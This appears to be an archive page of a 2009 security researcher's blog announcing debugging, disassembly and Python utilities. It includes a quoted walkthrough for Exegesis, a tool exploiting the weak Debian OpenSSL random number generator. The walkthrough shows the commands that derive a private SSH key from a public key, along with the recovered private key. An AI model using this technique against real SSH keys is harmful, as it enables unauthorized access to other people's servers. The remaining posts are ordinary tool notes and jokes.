Breaking Code

June 16, 2009

WinAppDbg version 1.2 is out!

Filed under: Tools — Tags: , , , , , , , , , , , , — Mario Vilas @ 7:23 pm

What is WinAppDbg?

The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment.

It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows.

The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes.

Current features also include disassembling x86 native code (using the open source diStorm project), debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing.

Where can I find WinAppDbg?

The WinAppDbg project is currently hosted at Sourceforge, and can be found at:

http://winappdbg.sourceforge.net/

It’s also hosted at the Python Package Index (PyPi):

http://pypi.python.org/pypi/winappdbg/1.2

May 28, 2009

Exegesis – A toolkit for abusing the broken PRNG in Debian OpenSSL

Filed under: Tools — Tags: , , , , , — Mario Vilas @ 9:05 pm

A new tool has just been released to exploit the Debian OpenSSL bug, it’s called Exegesis. It seems very interesing, it’s more complete and flexible than all of the existing ones. Definitely worth checking out!

Let’s see the description from it’s webpage:

Exegesis
--------

So you have an ssh public authentication key and you 'lost' the
private key.  Did you generate that key in the last two years on
Debian or Ubuntu GNU/Lunix?  Yes?  Ok, great.  

$ cat id_dsa.pub
ssh-dss AAAAB3NzaC1kc3MAAACBAIW0doTjIKPNwAjHogbLhXNxNlwdvHHKzFPgZ
5cpwF4a2e8YYlEyXo8gyoub5c2s0f8B61ZNkowc9tcN+Iy1aiE2LBloxds3IwWNpZ
8KnJruCX/mYbltUp3CNJP/8gmeL41akUddPJ5wg6pYjDY5z7Kd9lojhqKOn3qSPXZ
JDJXJAAAAFQDZMKlBeKVX9/FCO5auyzPHxn6QnwAAAIBULtChrN1rGfAjIU8VZwQa
rQNunGFDfstWNOcx0lvAm2DkQCVCFT8DUXlibHWQJJbeMk3DfOl02ItIAhMvTTAPM
rb8vtFsB3Fcw7KAuK0cAJaY3R2S6/tBbWXch7SaaOQ4dxa+8hmEl54icW/me0H6Z0
SEDYEm3j8pnAUnPAu/pgAAAIALkFjo4rsTTcSyW841Gdy+rhsH4St3dd4ZXiTdDVh
wCbpBqSqiYxZO/gBHdCDAIs2uD8+GElpv7Q5Hx0g5JYLoBCpa1O8R2UAZMapZORRE
umPRs6buJ4GMf33S5f/WSqdFaMo1+/67VkvUS/9Drtb7Mz3aI/QUIh1H3gfT0xFIm
A== lamer@gnubuntu

First you'll need the fingerprint.

$ ssh-keygen -l -f ./id_dsa.pub
1024 b2:f0:f6:47:19:64:ff:8e:8f:90:75:bd:57:6c:71:0c ./id_dsa.pub

Now look for that fingerprint in the generated fingerprint database
files.  You can just use 'grep' for this.

$ grep b2:f0:f6:47:19:64:ff:8e:8f:90:75:bd:57:6c:71:0c dsa_1024_32_le.out
b2:f0:f6:47:19:64:ff:8e:8f:90:75:bd:57:6c:71:0c 25191 dsa 1024 32 0

Oh, it's your lucky day!  You're on the list.

The fingerprint database files have the following format:

  fingerprint pid key_type key_bits arch big_endian

  pid        The process id of the ssh-keygen which originally generated the key
  key_type   Either 'dsa' or 'rsa' depending on the type of key
  key_bits   The size of the key.  1024 and 2048 are common.
  arch       Either 32 or 64 depending on the processor which the key was created on
  big_endian Is 1 if the key was generated on a big endian box or 0 otherwise

So, the key we matched is a 1024 bit DSA key, generated on a 32 bit little endian
processor.  That sounds about right.

$ ./exegesis
Usage: ./exegesis [options]
Options:
  -B            Select big endian target (default is little endian target).
  -A            Selecet 64 bit target (default is 32 bit target)
  -o <file>     Output file.
  -t (dsa|rsa)  Type of key(s) to generate (default is rsa)
  -b bits       Key size to generate in bits (default is 1024 bits)
  -g            Generate all keys for a range of pids (all pids by default)
  -r start,end  Specify a pid range to generate (default is 1,32768)
  -p pid        Generate a key for a chosen pid value

$ ./exegesis -t dsa -b 1024 -p 25191
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCFtHaE4yCjzcAIx6IGy4VzcTZcHbxxysxT4GeXKcBeGtnvGGJR
Ml6PIMqLm+XNrNH/AetWTZKMHPbXDfiMtWohNiwZaMXbNyMFjaWfCpya7gl/5mG5
bVKdwjST//IJni+NWpFHXTyecIOqWIw2Oc+ynfZaI4aijp96kj12SQyVyQIVANkw
qUF4pVf38UI7lq7LM8fGfpCfAoGAVC7QoazdaxnwIyFPFWcEGq0DbpxhQ37LVjTn
MdJbwJtg5EAlQhU/A1F5Ymx1kCSW3jJNw3zpdNiLSAITL00wDzK2/L7RbAdxXMOy
gLitHACWmN0dkuv7QW1l3Ie0mmjkOHcWvvIZhJeeInFv5ntB+mdEhA2BJt4/KZwF
JzwLv6YCgYALkFjo4rsTTcSyW841Gdy+rhsH4St3dd4ZXiTdDVhwCbpBqSqiYxZO
/gBHdCDAIs2uD8+GElpv7Q5Hx0g5JYLoBCpa1O8R2UAZMapZORREumPRs6buJ4GM
f33S5f/WSqdFaMo1+/67VkvUS/9Drtb7Mz3aI/QUIh1H3gfT0xFImAIUQOZiUdQQ
YO/Yg/6nRo4hghj28Tg=
-----END DSA PRIVATE KEY-----

Whoah?! Is that really the private key?  Let's compare it to the
original key generated with ssh-keygen

$ ./exegesis -t dsa -b 1024 -p 25191 > key.out
$ md5sum id_dsa key.out
0aa477a9a01c6724708f9f362bcf0f7d  id_dsa
0aa477a9a01c6724708f9f362bcf0f7d  key.out

Generating Databases
--------------------

$ ./exegesis -g -t dsa -b 1024 -o dsa_1024_32_le.out

Unlike inferior competing products, Exegesis models the backdoored PRNG
in Debian OpenSSL.  It uses a version of the OpenSSL random number and
key generating code that can be configured to behave like any of the
hardware platforms that affect the generated random numbers.

This means you can generate databases for each different relevant hardware
configuration without actually needing to run it on those architectures.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

WARNING: Generating your own databases takes a very long time and may
         cause side effects such as acute boredom and drowsiness.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Since we know you're anxious to get started recovering all those misplaced
private SSH keys, this release of Exegesis conveniently includes, right out
of the box, ten starter databases at no extra charge!

$ md5 keysets/*
MD5 (keysets/dsa_1024_32_be.out) = d422aa60e3d6180ec65adb7179ebe43d
MD5 (keysets/dsa_1024_32_le.out) = d6f1e5f4d5dd9e84a05de47cc9e0e81a
MD5 (keysets/dsa_1024_64_le.out) = 89d34fe52f083c7e0c2297c2d8439bbc
MD5 (keysets/dsa_2048_32_le.out) = b81ca4cd84613c0fa19056036153fc62
MD5 (keysets/dsa_2048_64_le.out) = f914df33f27a11d7b2ab06446c6c13ec
MD5 (keysets/rsa_1024_32_be.out) = f5a13ffcbc63206d1c90850e2ad2e052
MD5 (keysets/rsa_1024_32_le.out) = 082b47d57e1d77366ce3795359926440
MD5 (keysets/rsa_1024_64_le.out) = 18c80767c00db8130da8a77f7e81f448
MD5 (keysets/rsa_2048_32_le.out) = 977b88495603c860abbd48a47847065a
MD5 (keysets/rsa_2048_64_le.out) = dcdd098089281388e1c3bc935dec5b7e

ps:

This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/)

Download

May 27, 2009

Using diStorm with Python 2.6 and Python 3.x

Filed under: Tools — Tags: , , , , , , , — Mario Vilas @ 12:14 am

diStorm is currently my favorite disassember for Intel platforms. It’s small, fast, compiles virtually anywhere, and it’s got Python bindings for 2.3, 2.4 and 2.5. The only problem so far was trying to use it with Python 2.6 and above – the library has to be recompiled for each new version. To solve this problem a pure Python module using ctypes is shipped – but it’s interface is different from the C module, forcing us to code different routines.

So my solution was to code my own ctypes-based diStorm bindings. It’s compatible with the C version and it works in all Python 2.x versions. The DLL library has to be present in the path for it to work.

I’ve also ported it to Python 3.x. Both versions are tested under Windows only, however it should work correctly under Linux – let me know if you try it!

Here is also an example script using diStorm to disassemble a raw binary file. Could come in handy for example to disassemble the shellcode contained in an exploit, or to find anything that resembles shellcode in a packet capture.

Update

(more…)

May 18, 2009

WinAppDbg 1.1 released

Filed under: Tools — Tags: , , , , , , , , , , , , — Mario Vilas @ 1:18 am

New version of WinAppDbg!

New features include:

  • New tool: a simple command line debugger that supports plugins.
  • Added support for Microsoft debugging symbols.
  • Added support for py2exe, to generate standalone executables.
  • New Win32 API functions added to win32.py
  • Improvements to the breakpoints support, now “stalking” works for memory buffers and variables too.

This new version contains some bugfixes, so if you were using 1.0 I very much recommend to upgrade.

Download

April 21, 2009

WinAppDbg v1.0 is out!

Filed under: Tools — Tags: , , , , , , , , , , — Mario Vilas @ 4:51 pm

What is WinAppDbg?

The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment.

It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows.

The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes.

Current features also include disassembling x86 native code (using the open source diStorm project), debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing.

Where can I find WinAppDbg?

The winappdbg project is currently hosted at Sourceforge, and can be found at:

http://winappdbg.sourceforge.net/

February 6, 2009

Manipulating windows belonging to other processes

Filed under: Tools — Tags: , , , , — Mario Vilas @ 4:51 pm

Hello again. 🙂

Here’s a Python script that can be used to write Windows UI fuzzers and testers. It requires the win32 python extensions that can be downloaded from here (already included in the ActiveState distribution).

Enjoy!

Download the code: Window.py

January 5, 2009

Topo Facts!

Filed under: Just for fun — Mario Vilas @ 10:37 pm

WARNING: Inner jokes, just skip ahead to read the next post please 😉

Here they are, the infamous Topo Facts!

  • Topo can own your box by just staring at the monitor screen.
  • Topo never did his homework as a kid. He had a botnet to do it for him.
  • When Topo needs some ice for his whisky, there’s a hailstorm in Buenos Aires.
  • Topo taught Don Corleone all he knows.
  • Topo knows the Meaning of Life, the Universe and Everything, but he refuses to share it. He says the world is not ready for that knowledge yet.
  • When Mankind reached the Moon, there was a Topo flag there already.
  • Topo never pays his bills. It’s the governments of the world that pay him.
  • God created the Universe in one week. Topo created God one boring sunday afternoon after he ran out of mate and biscuits.
  • Topo can walk under the rain without getting wet. Raindrops are just too scared of touching him.
  • Topo built the Pyramids one day he was playing soccer and needed something to mark the goals.
  • No, Elvis is not dead. He just went home… to Topo’s home.
  • Topo was the real cause of the end of the Cold War. He wanted to make a garage sale with all his nuclear submarines.
  • Topo taught Maradona how to play soccer, because he felt sorry to see the poor guy play so bad.
  • Topo can tell the difference between modern art and pop subculture with just one glance.
  • Topo can calculate the integral of e ^ (t ^ 2) dt in his head.
  • Topo doesn’t sign NDAs to corporations. Corporations sign NDAs to him.
  • Clippo never dares to pop up when Topo uses MS Word.
  • When the Third World War comes, the only survivors will be roaches and Topo.
  • Topo coded DOS in five minutes but didn’t like it, so he gave it away to some guy named Bill… Doors or something.
  • When Mankind reached the Moon, besides the Topo flag, there was also a post-it saying “NASA, don’t leave your shit here. Topo”. Since they disobeyed, fights to the Moon were canceled decades ago.
  • Chuck Norris was jealous of Topo and stole some of his Facts.
  • Secret x86 instructions inserted by Topo:
    JT: Jump if Topo
TTS: Test if Topo, then Surrender
HLTN: HALT, Topo is Near
SPT: Send Password to Topo
CRS: Call Russian Submarine
SCTR: Store Credit Card in Topo Register
AYBABTT: All Your Base Are Belong To Topo

Credits go to the cool people at Core. But only the cool ones… you know who you are. 🙂

December 23, 2008

Working with Property List files in Python

Filed under: Tools — Tags: , , , — Mario Vilas @ 7:25 pm
Update: Python 2.6 now supports .plist files using the plistlib module, check it out!

Hi all. Today we have a tool I wrote some time ago to work with Mac OS Property List (.plist) files. This files have an XML based format, and can serialize high level objects like integers, floats, strings, arrays and dictionaries. There’s also a legacy plist format that doesn’t use XML and should also be easy to parse, but we won’t bother with it since it’s been deprecated in Mac OS 10.0. Here is the Wikipedia entry on Property List files for more details.

Here’s an example Property List file, taken from the Mac OS X Manual Page for plist:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
        "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
        <dict>
            <key>Year Of Birth</key>
            <integer>1965</integer>
            <key>Pets Names</key>
            <array/>
            <key>Picture</key>
            <data>
                PEKBpYGlmYFCPA==
            </data>
            <key>City of Birth</key>
            <string>Springfield</string>
            <key>Name</key>
            <string>John Doe</string>
            <key>Kids Names</key>
            <array>
                <string>John</string>
                <string>Kyra</string>
            </array>
        </dict>
    </plist>

As we can see, the data types supported by plist files are also supported natively by Python, so mapping Python objects as Property Lists should be quite straight forward, and it is. What I’m presenting here is a little tool that does the marshalling and unmarshalling, so you can use it pretty much like you would with Pickle, Shelve or Marshal.

A usage example. The following code reads the example plist file from above and produces a Python object, using the fromfile method.

    from PList import PList
    plist = PList.fromfile('example.plist')

Yeah, kinda simple, isn’t it 🙂

You can also load a plist from a string, using the fromstring method:

    from PList import PList
    data  = open('example.plist', 'r').read()
    plist = PList.fromstring(data)

Or from an ElementTree object, with the fromtree method:

    from PList import PList
    from xml.etree import ElementTree
    tree  = ElementTree.parse('example.plist')
    plist = PList.fromtree(tree)

In all cases the output is an ordinary Python object, tipically a dictionary or an array containing other objects. This is the Python object corresponding to the example plist shown above:

    {'City of Birth': 'Springfield',
     'Kids Names': ['John', 'Kyra'],
     'Name': 'John Doe',
     'Pets Names': [],
     'Picture': '<B\x81\xa5\x81\xa5\x99\x81B<',
     'Year Of Birth': 1965}

You can also write Python objects as Property List files. The output can be a string (the tostring method), an ElementTree tree (totree method) or a file (tofile method).

    from PList import PList
    PList.tofile('output.plist', plist)

Download the code: PList.py

bin2py.py

Filed under: Tools — Tags: , — Mario Vilas @ 6:14 pm

Hi there folks.

Here’s a little tool I coded quite some time ago, and probably we all have done the same at one time or another, maybe over and over again. It’s yet another binary-to-python-code converter. The catch is, this one has a few extra options that may come in handy…

  • Encodes using repr(), hexadecimal or base64
  • Compress with zlib or gzip
  • Also generates the code to uncompress and/or decode the data
  • Can work with a batch of files
  • Can generate multiple output files, or merge all output into one file
  • Cross-platform, of course, since it’s made in Python 🙂

The code kinda sucks (no classes, all functions, lots of copy paste) but it works. Anyway, a friend told me It’d be a good idea to post it here, so here it is. Enjoy.

Updated

Aug 3, 2011: Added some speed optimizations.

Download the code: bin2py.py

November 29, 2008

Ouroboros.py

Filed under: Just for fun — Tags: , , , — Mario Vilas @ 2:41 am

This is a little nonsense I just wrote after reading the Wikipedia entry for Ouroboros. Turns out this kind of programs already have a name too, Quine.

In this case it’s a Python script that uses InlineEgg to generate an ELF32 binary that generates a Python script that uses InlineEgg to generate an ELF32 binary that generates a Python script that uses InlineEgg to… well, you get the point. 🙂

Yeah, I know this is not really about computer security, but what the hell. It’s got Python and shellcode somewhere anyway.

A real Ouroboros!

A real Ouroboros!

Ouroboros.py

#!/usr/bin/python

from sys import argv, stdout
from inlineegg.inlineegg import InlineEgg, Linuxx86Syscall
from inlineegg.exelib import Elf32Program

script = open(argv[0], 'r').read()
egg = InlineEgg(Linuxx86Syscall)
egg.write(1, script, len(script))
egg.exit(0)
prg = Elf32Program()
prg.arch = prg.ARCH_I386
prg.addCode(str(egg))
stdout.write(prg.bytes())
« Newer PostsOlder Posts »

Create a free website or blog at WordPress.com.

Design a site like this with WordPress.com
Get started